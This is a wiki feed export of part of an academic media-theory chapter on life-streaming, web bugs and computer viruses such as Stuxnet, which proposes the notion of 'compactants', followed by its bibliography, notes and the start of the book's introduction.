&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4692</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4692"/>
		<updated>2012-04-18T12:18:21Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
